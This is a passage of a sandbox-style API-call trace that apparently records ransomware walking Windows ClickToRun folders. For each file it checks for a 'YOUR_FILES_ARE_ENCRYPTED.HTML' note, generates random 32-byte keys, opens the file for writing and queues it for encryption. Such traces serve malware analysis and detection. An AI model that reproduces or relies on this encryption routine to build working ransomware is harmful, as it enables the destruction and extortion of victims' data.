ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfig.2.xml", cAlternateFileName="DEPLOY~2.XML")) returned 1 [0155.385] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned 62 [0155.385] lstrcmpW (lpString1="DeploymentConfig.2.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.385] PathFindExtensionW (pszPath="DeploymentConfig.2.xml") returned=".xml" [0155.385] lstrlenW (lpString=".xml") returned 4 [0155.385] PathFindExtensionW (pszPath="DeploymentConfig.2.xml") returned=".xml" [0155.385] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0155.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0155.386] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=1382) returned 1 [0155.386] GetProcessHeap () returned 0x270000 [0155.386] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7400058 [0155.387] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="D6") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="A2") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="24") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9D") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DF") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="80") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="64") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="32") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="90") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="33") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="C9") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="A7") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="BB") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="BF") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="3D") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F5") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="11") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="64") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="30") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="78") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="85") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="3B") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="A3") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="AA") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="13") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="6E") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="BC") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="F9") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="A5") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E8") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="7D") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5C") returned 2 [0155.389] lstrcpyW (in: lpString1=0x741010c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" [0155.389] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7400058, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.389] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7400058, lpOverlapped=0x7400058) returned 1 [0155.389] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1 [0155.391] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData") returned 51 [0155.391] GetProcessHeap () returned 0x270000 [0155.391] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74281b0 [0155.391] lstrcpyW (in: lpString1=0x74281b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData" [0155.405] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*" [0155.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.406] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0155.406] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Catalog", cAlternateFileName="")) returned 1 [0155.406] wnsprintfW (in: pszDest=0x74281b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned 59 [0155.406] GetProcessHeap () returned 0x270000 [0155.406] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74381b8 [0155.408] lstrcpyW (in: lpString1=0x74381b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog" [0155.408] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*" [0155.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.409] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.409] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Packages", cAlternateFileName="")) returned 1 [0155.409] wnsprintfW (in: pszDest=0x74381b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned 68 [0155.409] GetProcessHeap () returned 0x270000 [0155.409] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74481c0 [0155.410] lstrcpyW (in: lpString1=0x74481c0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" [0155.410] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*" [0155.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0155.410] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.410] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0155.410] wnsprintfW (in: pszDest=0x74481c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned 107 [0155.410] GetProcessHeap () returned 0x270000 [0155.410] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.412] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" [0155.412] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*" [0155.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0155.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 1 [0155.412] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned 146 [0155.412] GetProcessHeap () returned 0x270000 [0155.412] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.413] lstrcpyW (in: lpString1=0x7410060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" [0155.413] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*" [0155.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0155.415] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.415] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c515d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfiguration.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0155.415] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml") returned 174 [0155.415] lstrcmpW (lpString1="DeploymentConfiguration.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.415] PathFindExtensionW (pszPath="DeploymentConfiguration.xml") returned=".xml" [0155.415] lstrlenW (lpString=".xml") returned 4 [0155.415] PathFindExtensionW (pszPath="DeploymentConfiguration.xml") returned=".xml" [0155.415] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.415] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.416] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=614) returned 1 [0155.416] GetProcessHeap () returned 0x270000 [0155.416] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.419] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="DE") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="AF") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="24") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="BC") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="DA") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="1C") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="26") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="BB") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="18") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="09") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="5B") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="D1") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="5D") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="D8") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="9C") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="02") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="A0") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="2E") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="CD") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="1C") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="2A") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="80") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="22") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="FC") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="47") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="56") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="15") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="F6") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="A6") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="54") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="C8") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="5E") returned 2 [0155.421] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" [0155.421] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.421] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.425] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f9afd70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f9afd70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2fa482f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x4ad286, dwReserved0=0x0, 